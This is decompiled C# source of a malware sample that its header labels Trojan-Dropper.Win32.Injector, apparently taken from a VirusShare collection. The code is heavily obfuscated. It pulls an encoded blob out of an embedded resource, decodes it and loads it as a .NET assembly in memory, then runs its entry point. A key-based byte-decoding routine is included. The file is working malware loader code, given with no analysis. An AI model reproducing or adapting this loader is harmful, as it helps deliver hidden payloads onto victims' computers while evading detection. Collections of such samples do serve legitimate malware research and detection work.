// Decompiled with JetBrains decompiler // Type: ǣƀƥǣǤӸƔƙƳǥƴƣƜƕơպƙȜƁƂƕƕҿǢƔƄռƋպֆƓƐȄƓƀƐƒռֆպȞӂƋǢƥƴƈƑȣƕƣǍƑƪƕȜƥƂփƓƎƓƜƲȜӸǣƀƙƏƑƴֆƎƄƴƅǢƕƜƁƜƂƉƂơƋƆǍƛ.ƏƙƱƑȄǍƁƓƱƏƒƪƩƍֆƛƱƴƆƔƁփƑƄպǎӸƘǎƖƲƥƁƉƉֆƴƘƄǢƗƁӸƏƙƑȮӂƳǎƥȄƈպơƖƋƥƖƆǭƈƁӂҿǥƘǥƲǍȄơֆƳȣƕƏǣӂơƜƉȮǤƓǤփǍƖȮǭƈƁӂҿǥƘǥƲǍȄơֆƳȣƕƏǣӂơƜƉȮǤƓǤփǍƖȮƲƥƁƉƉֆƴƘƄǢƗƁӸƏƙƑȮӂƳǎƥȄƈպơƖƋƥƖƆƀպӂƄȮȜƜƛǣӂֆƂǥƴƴփȜƥƉֆƲǢƥƙƑǢռҧƐȞƂȄǤȞƥƙӸպȞƩƒȜơƥȣƏƙǍҿӸǭƙƘƕǍƖƂȣƘǎƲƥƁƉƉֆƴƘƄǢƗƁӸƏƙƑȮӂƳǎƥȄƈպơƖƋƥƖƆƣȮƓǎփƏƕƀƲƪƓƆƖƒռȮƆƛƂƁǢƒƕƜȞƔƣƲƁƩռƑƥȞƥǤƐǎƍƆȣҧպҿƛӸƥƂƔƑǭǢǢƓƜƛƒƣƳȣƜȄƄƗȮƗƀֆƅƪƳҿơƲǢƙƂƣҿƪƈƩպƲƗƗӸҿƗǢƒƋƖƀǍƂƅƄֆƎȣƴƈƜƄǭռƣƙƔǍӂƓƄӂƳƗƋƄƉ // Assembly: cryptbs, Version=2.6.12.79, Culture=neutral, PublicKeyToken=null // MVID: FC627692-FCDB-4E6B-82E3-E24FD4825A81 // Assembly location: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\Trojan-Dropper.Win32.Injector.acsv-43bbe26a7f41a161062d0c91d3d16a0fee497cd0605b1916485a06b4465092c1.exe using System; using System.Reflection; using System.Resources; using System.Text; using System.Windows.Forms; namespace ǣƀƥǣǤӸƔƙƳǥƴƣƜƕơպƙȜƁƂƕƕҿǢƔƄռƋպֆƓƐȄƓƀƐƒռֆպȞӂƋǢƥƴƈƑȣƕƣǍƑƪƕȜƥƂփƓƎƓƜƲȜӸǣƀƙƏƑƴֆƎƄƴƅǢƕƜƁƜƂƉƂơƋƆǍƛ { internal class ƏƙƱƑȄǍƁƓƱƏƒƪƩƍֆƛƱƴƆƔƁփƑƄպǎӸƘǎƖƲƥƁƉƉֆƴƘƄǢƗƁӸƏƙƑȮӂƳǎƥȄƈպơƖƋƥƖƆǭƈƁӂҿǥƘǥƲǍȄơֆƳȣƕƏǣӂơƜƉȮǤƓǤփǍƖȮǭƈƁӂҿǥƘǥƲǍȄơֆƳȣƕƏǣӂơƜƉȮǤƓǤփǍƖȮƲƥƁƉƉֆƴƘƄǢƗƁӸƏƙƑȮӂƳǎƥȄƈպơƖƋƥƖƆƀպӂƄȮȜƜƛǣӂֆƂǥƴƴփȜƥƉֆƲǢƥƙƑǢռҧƐȞƂȄǤȞƥƙӸպȞƩƒȜơƥȣƏƙǍҿӸǭƙƘƕǍƖƂȣƘǎƲƥƁƉƉֆƴƘƄǢƗƁӸƏƙƑȮӂƳǎƥȄƈպơƖƋƥƖƆƣȮƓǎփƏƕƀƲƪƓƆƖƒռȮƆƛƂƁǢƒƕƜȞƔƣƲƁƩռƑƥȞƥǤƐǎƍƆȣҧպҿƛӸƥƂƔƑǭǢǢƓƜƛƒƣƳȣƜȄƄƗȮƗƀֆƅƪƳҿơƲǢƙƂƣҿƪƈƩպƲƗƗӸҿƗǢƒƋƖƀǍƂƅƄֆƎȣƴƈƜƄǭռƣƙƔǍӂƓƄӂƳƗƋƄƉ { public static ResourceManager պƑƥǍƣƉƙƉƒƲƐȮƴƜƈƘȄƛƐƉƱƍȄƱƏƋƣƜǍǥ = new ResourceManager("aeXA1kMRBuc3", Assembly.GetExecutingAssembly()); private static void Main() { try { ƏƙƱƑȄǍƁƓƱƏƒƪƩƍֆƛƱƴƆƔƁփƑƄպǎӸƘǎƖƲƥƁƉƉֆƴƘƄǢƗƁӸƏƙƑȮӂƳǎƥȄƈպơƖƋƥƖƆǭƈƁӂҿǥƘǥƲǍȄơֆƳȣƕƏǣӂơƜƉȮǤƓǤփǍƖȮǭƈƁӂҿǥƘǥƲǍȄơֆƳȣƕƏǣӂơƜƉȮǤƓǤփǍƖȮƲƥƁƉƉֆƴƘƄǢƗƁӸƏƙƑȮӂƳǎƥȄƈպơƖƋƥƖƆƀպӂƄȮȜƜƛǣӂֆƂǥƴƴփȜƥƉֆƲǢƥƙƑǢռҧƐȞƂȄǤȞƥƙӸպȞƩƒȜơƥȣƏƙǍҿӸǭƙƘƕǍƖƂȣƘǎƲƥƁƉƉֆƴƘƄǢƗƁӸƏƙƑȮӂƳǎƥȄƈպơƖƋƥƖƆƣȮƓǎփƏƕƀƲƪƓƆƖƒռȮƆƛƂƁǢƒƕƜȞƔƣƲƁƩռƑƥȞƥǤƐǎƍƆȣҧպҿƛӸƥƂƔƑǭǢǢƓƜƛƒƣƳȣƜȄƄƗȮƗƀֆƅƪƳҿơƲǢƙƂƣҿƪƈƩպƲƗƗӸҿƗǢƒƋƖƀǍƂƅƄֆƎȣƴƈƜƄǭռƣƙƔǍӂƓƄӂƳƗƋƄƉ.ƏƙƱƑȄǍƁƓƱƏƒƪƩƍֆƛƱƴƆƔƁփƑƄպǎӸƘǎƖƒռƓփƅƂƥƒȣƑֆƳȮƐơǥƩȞƅƛǍȜƍơƓҧƩƔӂƳƥƎƕƏƒƍƜǥƪƳǤƅƑƉǤփơȄƍǣƏƉƪƍƄƑƈǭƐƐ(Encoding.Default.GetBytes((string) ƏƙƱƑȄǍƁƓƱƏƒƪƩƍֆƛƱƴƆƔƁփƑƄպǎӸƘǎƖƲƥƁƉƉֆƴƘƄǢƗƁӸƏƙƑȮӂƳǎƥȄƈպơƖƋƥƖƆǭƈƁӂҿǥƘǥƲǍȄơֆƳȣƕƏǣӂơƜƉȮǤƓǤփǍƖȮǭƈƁӂҿǥƘǥƲǍȄơֆƳȣƕƏǣӂơƜƉȮǤƓǤփǍƖȮƲƥƁƉƉֆƴƘƄǢƗƁӸƏƙƑȮӂƳǎƥȄƈպơƖƋƥƖƆƀպӂƄȮȜƜƛǣӂֆƂǥƴƴփȜƥƉֆƲǢƥƙƑǢռҧƐȞƂȄǤȞƥƙӸպȞƩƒȜơƥȣƏƙǍҿӸǭƙƘƕǍƖƂȣƘǎƲƥƁƉƉֆƴƘƄǢƗƁӸƏƙƑȮӂƳǎƥȄƈպơƖƋƥƖƆƣȮƓǎփƏƕƀƲƪƓƆƖƒռȮƆƛƂƁǢƒƕƜȞƔƣƲƁƩռƑƥȞƥǤƐǎƍƆȣҧպҿƛӸƥƂƔƑǭǢǢƓƜƛƒƣƳȣƜȄƄƗȮƗƀֆƅƪƳҿơƲǢƙƂƣҿƪƈƩպƲƗƗӸҿƗǢƒƋƖƀǍƂƅƄֆƎȣƴƈƜƄǭռƣƙƔǍӂƓƄӂƳƗƋƄƉ.պƑƥǍƣƉƙƉƒƲƐȮƴƜƈƘȄƛƐƉƱƍȄƱƏƋƣƜǍǥ.GetObject("aQ8ZhGcxsG_zmxYWJVbiUyrnffY"))); } catch (Exception ex) { int num = (int) MessageBox.Show(ex.ToString()); } } public static void ƏƙƱƑȄǍƁƓƱƏƒƪƩƍֆƛƱƴƆƔƁփƑƄպǎӸƘǎƖƒռƓփƅƂƥƒȣƑֆƳȮƐơǥƩȞƅƛǍȜƍơƓҧƩƔӂƳƥƎƕƏƒƍƜǥƪƳǤƅƑƉǤփơȄƍǣƏƉƪƍƄƑƈǭƐƐ( byte[] ƴƪƕփփƗƪƔƩǭȣǎҧƐƎƣƔƆƈƆƑǢƁƗƙӂơƈƕƄռƔӸƉƄƪƱƲȜƪƒǢȄƱǎǢƔƴƘǥƅƕƁƱƐƜǍƔƅƋ) { MethodInfo entryPoint = Assembly.Load(ƴƪƕփփƗƪƔƩǭȣǎҧƐƎƣƔƆƈƆƑǢƁƗƙӂơƈƕƄռƔӸƉƄƪƱƲȜƪƒǢȄƱǎǢƔƴƘǥƅƕƁƱƐƜǍƔƅƋ).EntryPoint; object[] parameters = (object[]) null; if (entryPoint.GetParameters().Length > 0) parameters = new object[1] { (object) new string[1]{ "1" } }; entryPoint.Invoke((object) null, parameters); } public static byte[] ƲƥƁƉƉֆƴƘƄǢƗƁӸƏƙƑȮӂƳǎƥȄƈպơƖƋƥƖƆȞƄƲƖƄƖƎӸƆƍǣǥƎӂƓƅƑƐǥƴȜȮƈǭƅǥƣӸƜƔҧǭƍƈǥռƀơƩӸǥȜƕƜƓƴȜƘȜȜƩǭǍƜպƥǣȮƱƆEn( byte[] ռƑƥȞƥǤƐǎƍƆȣҧպҿƛӸƥƂƔƑǭǢǢƓƜƛƒƣƳȣ, string ƏƙƱƑȄǍƁƓƱƏƒƪƩƍֆƛƱƴƆƔƁփƑƄպǎӸƘǎƖ) { byte[] bytes = Encoding.ASCII.GetBytes(ƏƙƱƑȄǍƁƓƱƏƒƪƩƍֆƛƱƴƆƔƁփƑƄպǎӸƘǎƖ); int num = (int) ռƑƥȞƥǤƐǎƍƆȣҧպҿƛӸƥƂƔƑǭǢǢƓƜƛƒƣƳȣ[ռƑƥȞƥǤƐǎƍƆȣҧպҿƛӸƥƂƔƑǭǢǢƓƜƛƒƣƳȣ.Length - 1]; byte[] numArray = new byte[ռƑƥȞƥǤƐǎƍƆȣҧպҿƛӸƥƂƔƑǭǢǢƓƜƛƒƣƳȣ.Length - 1]; short index1 = 0; for (int index2 = 0; index2 < ռƑƥȞƥǤƐǎƍƆȣҧպҿƛӸƥƂƔƑǭǢǢƓƜƛƒƣƳȣ.Length - 1; ++index2) { if ((int) index1 >= bytes.Length) index1 = (short) 0; if (index2 < ռƑƥȞƥǤƐǎƍƆȣҧպҿƛӸƥƂƔƑǭǢǢƓƜƛƒƣƳȣ.Length - 1) { numArray[index2] = Convert.ToByte((int) ռƑƥȞƥǤƐǎƍƆȣҧպҿƛӸƥƂƔƑǭǢǢƓƜƛƒƣƳȣ[index2] - numArray.Length % bytes.Length - (int) bytes[(int) index1] + num); ++index1; } } return numArray; } } }